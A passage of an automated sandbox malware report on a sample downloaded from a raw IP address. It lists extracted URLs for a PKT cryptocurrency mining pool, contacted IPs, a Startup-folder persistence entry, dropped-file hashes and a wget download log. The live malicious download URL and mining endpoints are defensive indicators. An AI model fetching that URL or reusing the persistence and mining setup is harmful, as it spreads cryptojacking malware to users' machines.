http://master.pkt.world/pay5J	packetcrypt.exe, 00000008.00000002.3223221500.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2849098159.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2629587306.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749222172.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3031751868.000002451F21C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749266645.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959832741.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3164309843.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.	packetcrypt.exe, 00000008.00000003.2849144652.000002451F1D1000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3032077071.000002451F1D5000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3032195378.000002451F1DC000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2849195427.000002451F1DC000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223221500.000002451F1D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet/app-launch-failed	pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	false		high
http://23.2	wget.exe, 00000002.00000002.1995575922.0000000000B80000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://.css	pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/master0J	packetcrypt.exe, 00000008.00000002.3223221500.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2849098159.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2629587306.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749222172.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3031751868.000002451F21C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749266645.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959832741.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3164309843.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/blk/submit?J	packetcrypt.exe, 00000008.00000002.3223221500.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2849098159.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2629587306.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749222172.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3031751868.000002451F21C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749266645.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959832741.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3164309843.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.worlds	packetcrypt.exe, 00000008.00000002.3220492257.000002451C5A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/clap-rs/clap/issues	packetcrypt.exe, 00000008.00000000.2411177944.00007FF632E74000.00000002.00000001.01000000.0000000E.sdmp	false		high
https://github.com/clap-rs/clap/issues#	pkt1.exe, 00000006.00000002.3221267777.0000025676052000.00000002.00000001.01000000.00000007.sdmp, packetcrypt.exe, 00000008.00000000.2411177944.00007FF632E74000.00000002.00000001.01000000.0000000E.sdmp	false		high
https://aka.ms/dotnet-core-applaunch?	pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	false		high
https://github.com/dotnet/runtime	pkt1.exe, 00000006.00000002.3264924713.00007FF8B78A1000.00000020.00000001.01000000.0000000A.sdmp, pkt1.exe, 00000006.00000002.3220861008.0000025674032000.00000002.00000001.01000000.00000010.sdmp, pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000006.00000002.3265197772.00007FF8BA4F1000.00000020.00000001.01000000.0000000C.sdmp, pkt1.exe, 00000006.00000002.3264827588.00007FF8B7821000.00000020.00000001.01000000.0000000B.sdmp, pkt1.exe, 00000006.00000002.3220953516.0000025674042000.00000002.00000001.01000000.00000011.sdmp, pkt1.exe, 00000006.00000002.3220795521.0000025674022000.00000002.00000001.01000000.0000000F.sdmp, pkt1.exe, 00000006.00000002.3265112566.00007FF8B9F61000.00000020.00000001.01000000.0000000D.sdmp, pkt1.exe, 00000006.00000002.3222444888.00000256780F0000.00000004.00000020.00020000.00000000.sdmp, pkt1.exe, 00000006.00000002.3265014655.00007FF8B7E01000.00000020.00000001.01000000.00000008.sdmp, pkt1.exe, 00000006.00000002.3265265471.00007FF8BA511000.00000020.00000001.01000000.00000009.sdmp, System.Globalization.Extensions.dll.6.dr, System.Xml.XDocument.dll.6.dr, System.Reflection.Extensions.dll.6.dr, System.Net.Http.Json.dll.6.dr, System.Runtime.Handles.dll.6.dr, System.Private.Xml.dll.6.dr, Microsoft.Win32.Primitives.dll.6.dr, System.Net.NetworkInformation.dll.6.dr, System.Diagnostics.Tools.dll.6.dr, System.Numerics.dll.6.dr	false		high
http://pool.pkt.world/config.jsonf	packetcrypt.exe, 00000008.00000003.2841134328.000002451F29C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869132042.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/clap-rs/clap/issues/home/runner/.cargo/registry/src/index.crates.io-6f17d22bba150	packetcrypt.exe, 00000008.00000000.2411177944.00007FF632E74000.00000002.00000001.01000000.0000000E.sdmp	false		high
http://pool.pkt.world/config.json	packetcrypt.exe, 00000008.00000002.3220492257.000002451C58C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master/blkinfo_4087dcaf89d1ca4fef66e3d92de41a60caae8f691d440ea9391937078046b3f	packetcrypt.exe, 00000008.00000002.3220492257.000002451C5C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet-warnings/	pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000006.00000002.3265197772.00007FF8BA4F1000.00000020.00000001.01000000.0000000C.sdmp, pkt1.exe, 00000006.00000002.3265112566.00007FF8B9F61000.00000020.00000001.01000000.0000000D.sdmp, pkt1.exe, 00000006.00000002.3221181559.0000025675A50000.00000004.00001000.00020000.00000000.sdmp, pkt1.exe, 00000006.00000002.3265265471.00007FF8BA511000.00000020.00000001.01000000.00000009.sdmp, System.Private.Xml.dll.6.dr, System.Net.NetworkInformation.dll.6.dr, System.Collections.Specialized.dll.6.dr, System.Net.WebHeaderCollection.dll.6.dr	false		high
http://pool.pkt.world/config.json#T4	packetcrypt.exe, 00000008.00000003.2555320114.000002451F1FF000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2555529474.000002451F226000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibility	System.Private.CoreLib.dll.6.dr	false		high
https://github.com/dotnet/runtime/issues/71847	pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	false		high
http://pool.pkt.world=C:HOMEPATH	packetcrypt.exe, 00000008.00000002.3220847412.000002451C900000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/binaryformatter	pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	false		high
https://github.com/mono/linker/pull/649	pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	false		high
https://github.com/dotnet/runtimeJ	System.Runtime.Handles.dll.6.dr	false		high
http://pool.p	packetcrypt.exe, 00000008.00000002.3220492257.000002451C5C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.jpg	pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/config.json2ldgukth5a	packetcrypt.exe, 00000008.00000002.3223014589.000002451F0E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master.json	packetcrypt.exe, 00000008.00000003.2959391142.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master	packetcrypt.exe, 00000008.00000003.3032136181.000002451F1B1000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3163198339.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/masterNum	packetcrypt.exe, 00000008.00000003.2555320114.000002451F248000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2556530550.000002451F25E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/masterT	packetcrypt.exe, 00000008.00000003.2959391142.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world	packetcrypt.exe, 00000008.00000002.3220492257.000002451C5A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet/download%s%sInstall	pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	false		high
https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/	pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	false		high
http://exslt.org/common	System.Private.Xml.dll.6.dr	false		high
http://pool.pkt.world/blk/submitnl	packetcrypt.exe, 00000008.00000002.3223583370.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3163198339.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://master.pkt.world/paya	packetcrypt.exe, 00000008.00000003.2555320114.000002451F248000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2556530550.000002451F25E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://any.ah.pkt.world/anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad556	packetcrypt.exe, 00000008.00000003.2869330836.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223583370.000002451F2CE000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3032136181.000002451F1B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet-illink/com	pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	false		high
http://master.pkt.world/pay(J#	packetcrypt.exe, 00000008.00000003.3031751868.000002451F21C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959832741.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://master.pkt.world/payl	packetcrypt.exe, 00000008.00000003.2841134328.000002451F29C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869132042.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet-illink/nativehostt	pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp	false		high
https://github.com/mono/linker/issues/378	pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	false		high
http://pool.pkt.world/blk/submitn	packetcrypt.exe, 00000008.00000002.3223583370.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3163198339.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.catcert.net/verarrel	pkt1.exe, 00000006.00000002.3221267777.0000025676052000.00000002.00000001.01000000.00000007.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C5C8000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C5A6000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000000.2411177944.00007FF632E74000.00000002.00000001.01000000.0000000E.sdmp, packetcrypt.exe, 00000008.00000003.2556654359.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869330836.000002451C600000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2556654359.000002451C617000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C5FE000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C617000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223014589.000002451F0BB000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869330836.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2556654359.000002451C5FF000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223014589.000002451F090000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223014589.000002451F070000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869330836.000002451C617000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pool.pkt.worldG	packetcrypt.exe, 00000008.00000002.3220492257.000002451C5A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet/sdk-not-foundProbing	pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/masteraK	packetcrypt.exe, 00000008.00000003.2629587306.000002451F21D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://any.ah.pkt.world	packetcrypt.exe, 00000008.00000003.2748829780.000002451F226000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959945799.000002451F265000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F261000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2849033044.000002451F261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	System.Private.Xml.dll.6.dr	false		high
https://github.com/dotnet/runtime/issues/50820	System.Private.Xml.dll.6.dr	false		high
http://master.pkt.world/pay	packetcrypt.exe, 00000008.00000003.2869330836.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223583370.000002451F2CE000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3032136181.000002451F1B1000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3163198339.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/GlobalizationInvariantMode	pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	false		high
http://23.27.51.244/dr0p.exem	wget.exe, 00000002.00000002.1995534130.0000000000B15000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.worldC:	packetcrypt.exe, 00000008.00000002.3220492257.000002451C580000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/masterG	packetcrypt.exe, 00000008.00000003.2841134328.000002451F29C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869132042.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.27.51.244/dr0p.exel	wget.exe, 00000002.00000002.1995534130.0000000000B10000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet-illink/nativehost	pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	false		high
https://aka.ms/dotnet/download	pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/masterN	packetcrypt.exe, 00000008.00000003.2555320114.000002451F248000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2556530550.000002451F25E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.27.51.244	unknown	United States	18779	EGIHOSTINGUS	true
151.80.239.86	pool.pkt.world	Italy	16276	OVHFR	false
23.147.168.68	any.ah.pkt.world	Reserved	395846	DIRECTCOMIDUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585253
Start date and time:	2025-01-07 11:58:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	urldownload.jbs
Sample URL:	http://23.27.51.244/dr0p.exe
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.adwa.win@11/176@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://23.27.51.244/dr0p.exe

Simulations

Behavior and APIs

Time	Type	Description
11:58:58	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe
File Type:	PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1005840
Entropy (8bit):	6.7186531276890715
Encrypted:	false
SSDEEP:	24576:06dJq30vVE6z8LpeNY+9whtbShFtHVu9yHesCGDUD3I1i:FQ34VEYKaY++tbiHVu9yHFgrt
MD5:	9B2A6ABE569D6BFF344CF07D3DF523A3
SHA1:	2856F7F922F70A44132D02C0723EC2FA91E1FEDB
SHA-256:	099BC112DC645BC4A1FC453E3B4C1FC93A164BFAF69E84C85C2B6EFAC0F7FAAB
SHA-512:	B649400460CF236197ED168702707FB7E81FE4AA3D2542EDC07B1D3E1C520C6ECA54F77F7ABDB2DB297AEA0BC82E7A07ABF99A89CB958FEC138CDEE4FDEC5E79
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...[............." ..... ...................................................0............`...@......@............... ..................................d....*..TQ...0...)...........;..p...........................................................h...H............text............ .................. ..`.data........0.......0..............@....reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\download\dr0p.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	42445246
Entropy (8bit):	7.8570881105931605
Encrypted:	false
SSDEEP:	786432:Vbn8aqof9w/btha295CIkrysYevnvLe8odU2EGyUh+j3xO7q7w:Vb8aqw92GkSysJvnvafPcBO20
MD5:	5F6CDA0F181FE14E6D395CDB50C37C41
SHA1:	FADDE84250EBDA58F7FF880B5942D7B6ACB494BB
SHA-256:	717FE92A00AB25CAE8A46265293E3D1F25B2326ECD31406E7A2821853C64D397
SHA-512:	C7C127A650508F21C7447184984374395F5DEC259DEAAA381D8CFFFB46E9209340530C0D7187027606F67B8309BEDF7F1EA7A587AD34EDF64BF54649065B9918
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y..N8.DN8.DN8.DG@vDX8.D...EZ8.D...E\8.D...E.8.D>..EF8.D>..EC8.DN8.DF:.D]..E[8.D]..E.:.D]..EO8.D]..DO8.D]..EO8.DRichN8.D........PE..d...!_.g.........."....(..a...1.......\........@.............................p............`..........................................fy......gy.h....p.. s....{..`.............,~....p.T.....................p.(...@Eb.@.............a......dy.`....................text.....a.......a................. ..`.CLR_UEF......a.......a............. ..`.rdata........a.......a.............@..@.data.........y......ty.............@....pdata...`....{..b....z.............@..@.didat..8............n}.............@...Section...... .......p}.............@..._RDATA...2...0...4...r}.............@..@.rsrc... s...p...t....~.............@..@.reloc..,~.........................@..B................................................................................

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	425
Entropy (8bit):	4.921573732145432
Encrypted:	false
SSDEEP:	12:HDRKBbo9B11De5RhKIHjLbV3JRbKAYAiV3JRbKi:VKBbcB1xePgIDFPbdQPbf
MD5:	170272504CBD629B5B0CF691F4748FA7
SHA1:	0EFC3960D5F7449D0CC17EDFEF2A9AD387424B10
SHA-256:	AB8F226E56A17CCEBD895D59083A148975D86C2E38A73063CC8E98480BB51A69
SHA-512:	6B1F4A54DCC46BEB2A60AFB280A889D87BD58251AABF66F61C20E8EA7AF955BF8B7B5BFF42447F0B229ACC3EE6B986D8B32A64D5619C26CB62FB7340136220C2
Malicious:	false
Reputation:	low
Preview:	--2025-01-07 05:58:51-- http://23.27.51.244/dr0p.exe..Connecting to 23.27.51.244:80... connected...HTTP request sent, awaiting response... 200 OK..Length: 541 [application/x-msdos-program]..Saving to: 'C:/Users/user/Desktop/download/dr0p.exe'.... 0K 100% 4.91M=0s....2025-01-07 05:58:51 (4.91 MB/s) - 'C:/Users/user/Desktop/download/dr0p.exe' saved [541/541]....

Process:	C:\Windows\SysWOW64\wget.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	541
Entropy (8bit):	7.200897825709746
Encrypted:	false
SSDEEP:	6:6KJAMslZy5BtIROZYlE+ltS+E20TtLRgEz4YtlWdps+pNsWi/WJMQBVkOiWy48AV:6zsqplcTBCENMdplQRwr8qXAs1
MD5:	5290766026D3727C3262FD48DB6DB0A4
SHA1:	59AEC8A9C0E6F59BFEE7902FBDCB6E3B9932A93B
SHA-256:	D078D8690446E831ACC794EE2DF5DFABCC5299493E7198993149E3C0C33CCB36
SHA-512:	0C7A27B3E7E86C3A93085C991CAA7C781CF96239DDF7E7A5842402B5539D8B35EA695ECBC654D28AA3F502B5827620D38717AC65BC508E644DD2B69B32BB07B9
Malicious:	true
Reputation:	low
Preview:	MZ23PE..L.....-..@...E.,......`....2.ukNO1.d.....r.u..Z..@.............y.....P=.....w..0...Z\|......S...B.j.X1...Wj.Yj.=....j...e$...`..1...t$(N.au.@B..r.........F9.......V$=....t..F ....aK..r.u.[f.........Z9.r..).)....G..1.......@..l.....x..........a.3..<..[<./..R.....nQ.VR.B...m....^G......?q.P)V.B.P.....E.8X.`..W.]...jq-..`2.......>P....`X.v{.Vl.T....^Xd.B...d..A.<8j..x.,....}......6.....:.c4+WY.G).nN......@%h.jl.n#r..B.z.c..4..4....KcgKz\7...0.b..k........O.,..d.....6O.c".h$W....d..v;...}.."..sm!\ddmT.i...3u..

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 11:59:34.847059965 CET	192.168.2.5	1.1.1.1	0x536e	Standard query (0)	pool.pkt.world	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:59:48.450774908 CET	192.168.2.5	1.1.1.1	0x91be	Standard query (0)	any.ah.pkt.world	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 11:59:34.864885092 CET	1.1.1.1	192.168.2.5	0x536e	No error (0)	pool.pkt.world	151.80.239.86	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:59:34.864885092 CET	1.1.1.1	192.168.2.5	0x536e	No error (0)	pool.pkt.world	23.147.168.200	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:59:34.864885092 CET	1.1.1.1	192.168.2.5	0x536e	No error (0)	pool.pkt.world	199.16.240.187	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:59:48.458081961 CET	1.1.1.1	192.168.2.5	0x91be	No error (0)	any.ah.pkt.world	23.147.168.68	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:59:48.458081961 CET	1.1.1.1	192.168.2.5	0x91be	No error (0)	any.ah.pkt.world	199.16.240.197	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:59:48.458081961 CET	1.1.1.1	192.168.2.5	0x91be	No error (0)	any.ah.pkt.world	199.16.240.209	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:59:48.458081961 CET	1.1.1.1	192.168.2.5	0x91be	No error (0)	any.ah.pkt.world	199.16.240.205	A (IP address)	IN (0x0001)	false
